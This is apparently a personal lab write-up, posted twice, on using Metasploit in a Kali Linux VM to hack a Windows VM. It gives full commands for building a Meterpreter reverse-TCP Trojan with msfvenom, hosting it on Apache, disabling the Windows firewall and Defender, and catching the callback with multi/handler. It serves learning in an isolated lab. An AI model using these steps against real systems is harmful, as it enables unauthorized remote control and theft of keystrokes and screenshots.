Ethical Hacking 3 - Prepping To Hack Into Windows VM
Description:
In Ethical Hacking 3 - Remote Hacking Windows VM Part 1, I will embark on an immersive journey into the realm of ethical hacking. This hands-on lesson will guide me in utilizing Metasploit within Kali Linux to create a Trojan malware, specifically a reverse TCP Trojan executable containing Meterpreter. I will gain insights into the capabilities of Trojan malware, including its ability to steal screenshots and keystrokes. Furthermore, this lesson will cover the creation of a web-sharable and executable folder, enabling me to initiate hacks from a Kali Linux VM into a Windows VM. I will also learn how to effectively listen with Kali Linux while executing these hacking techniques on a Windows VM, providing me with a foundational understanding of remote hacking methodologies.
Environment Used
Kali Linux and Windows VM :
Network Attached to: NAT Network
Name: PublicNAT
IP Address = 10.0.9 Network
Tool Used: Metasploit from Kali Linux
Launching Metasploit on Kali Linux VM
Open up Kali Linux on the Oracle VM Application
Click on the top left corner of the VM for application > Scroll down to 8. Exploitation Tools > Metasploit framework
Metaspolit Navigation
3. Creating a Reverse TCP Trojan executable containing Meterpreter:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=[your Kali Linux IP Address] -f exe -o ~/Desktop/["Name".exe]
- -p = payload
- windows/meterpreter/reverse_tcp = can just send people this file and if they click on it then it will give us a reverse TCP connection
- LHOST = Local Host Address; Kali Linux IP Address
- -f exe = format of an executable file
- -o ~/Desktop/"name".exe = output; ~/Desktop = saving on desktop on Kali Linux; /"name".exe = naming the program
- Metasploit framework Venom is a payload creation tool
- Allows to embed a payload called Meterpreter
- Meterpreter = tool that gives remote shell/ complete control over a remote computer
4. Msfvenom Payload and Payload successfully created on the Desktop of Kali Linux:
- >msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.9.4 -f exe -o ~/Desktop/Diablo5.exe
Msfvenom Payload and Payload Created on Desktop
Sharing the Payload over the internet
1. Create a web sharable and executable folder named "share"
- In the Metasploit Framework application type in:
- sudo mkdir /var/www/html/share
- This creates a folder
- sudo cp ~/Desktop/[createdTrojan] /var/www/html/share
- This copies the Trojan to the folder we just created
- sudo service apache2 start
- This starts the Apache web server on the Kali Linux
Creating the Sharable/executable Folder
2. Can check if the Apache Web server is running or not by
- Type in Firefox browser: localhost/share
Firefox: Localhost/share/
Prep Windows VM to be Hackable
- Check if the Setting of the VM to enable USB Controller
- Run CMD.exe as Administrator and turn off Virus & Threat Protection:
- In cmd: >netsh advfirewall set allprofiles state off
- In Virus & Threat Protection > Manage settings > Turn off Real-time protection, cloud-delivered protection, Automatic sample submission, and Temper Protection
Prepping Windows VM
Infect Windows VM with the Trojan Virus
1. Setup on Kali Linux to listen for the infected PC:
- on the Kali Linux Metasploit Framework type:
- >use exploit/multi/handler
- Tool inside Metasploit allows us to listen for or handle different virus payloads calling back into Kali Linux
- >set PAYLOAD windows/meterpreter/reverse_tcp
- set the payload to match Windows reverse TCP
- >show options
- see what option we have here; need to set a Localhost [IP for Kali Linux]
- >set LHOST 10.0.9.4
- set our localhost to be 10.0.9.4
- >exploit
- run the exploit
Prepping Kali Linux VM for Listening
2. Go back to the Windows VM to surf to the Kali Linux IP Address on Browser
- On the Browser URL type in Kali Linux's IP address with the share folder [10.0.9.4]
- >10.0.9.4/share
Windows VM Browsing Kali Linux's Trojan Virus Folder
3. Download the Diablo5.exe and run it
4. Kali Linux VM will start listening and is capable of running commands remotely through the interpreter shell
Successfully Infected Windows VM and Taken Control
Conclusion
In conclusion, Ethical Hacking 3 - Remote Hacking Windows VM Part 1 has provided me with a captivating journey into the world of ethical hacking. This hands-on lesson equipped me with the knowledge and skills to use Metasploit within Kali Linux for creating a reverse TCP Trojan executable containing Meterpreter, shedding light on the capabilities of Trojan malware, such as screenshot theft and keystroke capture. Additionally, I learned the intricacies of building a web-sharable and executable folder, enabling me to execute hacks from a Kali Linux VM into a Windows VM. Mastering the art of listening with Kali Linux while performing these hacking techniques on a Windows VM has laid a solid foundation for my understanding of remote hacking methodologies.
- It is imperative to refrain from conducting unauthorized Trojan malware attacks over the internet, as such actions may lead to legal consequences.
- Emphasizing the significance of cybersecurity, it is crucial to:
- Employ a robust and up-to-date antivirus solution.
- Exercise caution when downloading software from online sources.
- Ensure regular updates for your antivirus and firewall systems.
- Inadequate security measures render your devices susceptible to exploitation by malicious actors, thereby underscoring the importance of maintaining a robust security posture.
Ethical Hacking 3 - Prepping To Hack Into Windows VM
Description:
In Ethical Hacking 3 - Remote Hacking Windows VM Part 1, I will embark on an immersive journey into the realm of ethical hacking. This hands-on lesson will guide me in utilizing Metasploit within Kali Linux to create a Trojan malware, specifically a reverse TCP Trojan executable containing Meterpreter. I will gain insights into the capabilities of Trojan malware, including its ability to steal screenshots and keystrokes. Furthermore, this lesson will cover the creation of a web-sharable and executable folder, enabling me to initiate hacks from a Kali Linux VM into a Windows VM. I will also learn how to effectively listen with Kali Linux while executing these hacking techniques on a Windows VM, providing me with a foundational understanding of remote hacking methodologies.
Environment Used
Kali Linux and Windows VM :
Tool Used: Metasploit from Kali Linux
Launching Metasploit on Kali Linux VM
Open up Kali Linux on the Oracle VM Application
Click on the top left corner of the VM for application > Scroll down to 8. Exploitation Tools > Metasploit framework
Metaspolit Navigation
3. Creating a Reverse TCP Trojan executable containing Meterpreter: - msfvenom -p windows/meterpreter/reverse_tcp LHOST=[your Kali Linux IP Address] -f exe -o ~/Desktop/["Name".exe] - -p = payload - windows/meterpreter/reverse_tcp = can just send people this file and if they click on it then it will give us a reverse TCP connection - LHOST = Local Host Address; Kali Linux IP Address - -f exe = format of an executable file - -o ~/Desktop/"name".exe = output; ~/Desktop = saving on desktop on Kali Linux; /"name".exe = naming the program - Metasploit framework Venom is a payload creation tool - Allows to embed a payload called Meterpreter - Meterpreter = tool that gives remote shell/ complete control over a remote computer 4. Msfvenom Payload and Payload successfully created on the Desktop of Kali Linux: - >msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.9.4 -f exe -o ~/Desktop/Diablo5.exe
Msfvenom Payload and Payload Created on Desktop
Sharing the Payload over the internet
1. Create a web sharable and executable folder named "share" - In the Metasploit Framework application type in: - sudo mkdir /var/www/html/share - This creates a folder - sudo cp ~/Desktop/[createdTrojan] /var/www/html/share - This copies the Trojan to the folder we just created - sudo service apache2 start - This starts the Apache web server on the Kali LinuxCreating the Sharable/executable Folder
2. Can check if the Apache Web server is running or not by - Type in Firefox browser: localhost/share
Firefox: Localhost/share/
Prep Windows VM to be Hackable
- Check if the Setting of the VM to enable USB Controller - Run CMD.exe as Administrator and turn off Virus & Threat Protection: - In cmd: >netsh advfirewall set allprofiles state off - In Virus & Threat Protection > Manage settings > Turn off Real-time protection, cloud-delivered protection, Automatic sample submission, and Temper ProtectionPrepping Windows VM
Infect Windows VM with the Trojan Virus
1. Setup on Kali Linux to listen for the infected PC: - on the Kali Linux Metasploit Framework type: - >use exploit/multi/handler - Tool inside Metasploit allows us to listen for or handle different virus payloads calling back into Kali Linux - >set PAYLOAD windows/meterpreter/reverse_tcp - set the payload to match Windows reverse TCP - >show options - see what option we have here; need to set a Localhost [IP for Kali Linux] - >set LHOST 10.0.9.4 - set our localhost to be 10.0.9.4 - >exploit - run the exploitPrepping Kali Linux VM for Listening
2. Go back to the Windows VM to surf to the Kali Linux IP Address on Browser - On the Browser URL type in Kali Linux's IP address with the share folder [10.0.9.4] - >10.0.9.4/share
Windows VM Browsing Kali Linux's Trojan Virus Folder
3. Download the Diablo5.exe and run it 4. Kali Linux VM will start listening and is capable of running commands remotely through the interpreter shell
Successfully Infected Windows VM and Taken Control
Conclusion
In conclusion, Ethical Hacking 3 - Remote Hacking Windows VM Part 1 has provided me with a captivating journey into the world of ethical hacking. This hands-on lesson equipped me with the knowledge and skills to use Metasploit within Kali Linux for creating a reverse TCP Trojan executable containing Meterpreter, shedding light on the capabilities of Trojan malware, such as screenshot theft and keystroke capture. Additionally, I learned the intricacies of building a web-sharable and executable folder, enabling me to execute hacks from a Kali Linux VM into a Windows VM. Mastering the art of listening with Kali Linux while performing these hacking techniques on a Windows VM has laid a solid foundation for my understanding of remote hacking methodologies. - It is imperative to refrain from conducting unauthorized Trojan malware attacks over the internet, as such actions may lead to legal consequences. - Emphasizing the significance of cybersecurity, it is crucial to: - Employ a robust and up-to-date antivirus solution. - Exercise caution when downloading software from online sources. - Ensure regular updates for your antivirus and firewall systems. - Inadequate security measures render your devices susceptible to exploitation by malicious actors, thereby underscoring the importance of maintaining a robust security posture.